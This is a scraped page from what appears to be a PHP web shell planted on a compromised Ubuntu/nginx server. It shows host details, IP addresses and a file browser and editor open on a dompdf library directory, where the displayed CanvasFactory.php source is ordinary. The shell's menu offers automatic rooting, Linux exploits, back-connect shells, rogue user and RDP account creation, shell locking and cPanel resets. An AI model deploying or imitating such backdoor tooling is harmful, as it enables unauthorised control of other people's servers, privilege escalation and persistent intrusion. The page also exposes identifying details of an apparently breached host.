Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core /
vendor /
dompdf /
dompdf /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Adapter
[ DIR ]
drwxrwxr-x
Css
[ DIR ]
drwxrwxr-x
Exception
[ DIR ]
drwxrwxr-x
Frame
[ DIR ]
drwxrwxr-x
FrameDecorator
[ DIR ]
drwxrwxr-x
FrameReflower
[ DIR ]
drwxrwxr-x
Image
[ DIR ]
drwxrwxr-x
Positioner
[ DIR ]
drwxrwxr-x
Renderer
[ DIR ]
drwxrwxr-x
Autoloader.php
899
B
-rw-rw-r--
Canvas.php
11.46
KB
-rw-rw-r--
CanvasFactory.php
1.49
KB
-rw-rw-r--
Cellmap.php
23.03
KB
-rw-rw-r--
Dompdf.php
39.88
KB
-rw-rw-r--
Exception.php
600
B
-rw-rw-r--
FontMetrics.php
15.51
KB
-rw-rw-r--
Frame.php
31.32
KB
-rw-rw-r--
Helpers.php
32.42
KB
-rw-rw-r--
JavascriptEmbedder.php
977
B
-rw-rw-r--
LineBox.php
7.18
KB
-rw-rw-r--
Options.php
26.52
KB
-rw-rw-r--
PhpEvaluator.php
1.31
KB
-rw-rw-r--
Renderer.php
8.5
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CanvasFactory.php
<?php /** * @package dompdf * @link http://dompdf.github.com/ * @author Benj Carson <benjcarson@digitaljunkies.ca> * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License */ namespace Dompdf; /** * Create canvas instances * * The canvas factory creates canvas instances based on the * availability of rendering backends and config options. * * @package dompdf */ class CanvasFactory { /** * Constructor is private: this is a static class */ private function __construct() { } /** * @param Dompdf $dompdf * @param string|array $paper * @param string $orientation * @param string $class * * @return Canvas */ static function get_instance(Dompdf $dompdf, $paper = null, $orientation = null, $class = null) { $backend = strtolower($dompdf->getOptions()->getPdfBackend()); if (isset($class) && class_exists($class, false)) { $class .= "_Adapter"; } else { if (($backend === "auto" || $backend === "pdflib") && class_exists("PDFLib", false) ) { $class = "Dompdf\\Adapter\\PDFLib"; } else { if ($backend === "gd" && extension_loaded('gd')) { $class = "Dompdf\\Adapter\\GD"; } else { $class = "Dompdf\\Adapter\\CPDF"; } } } return new $class($paper, $orientation, $dompdf); } }
Close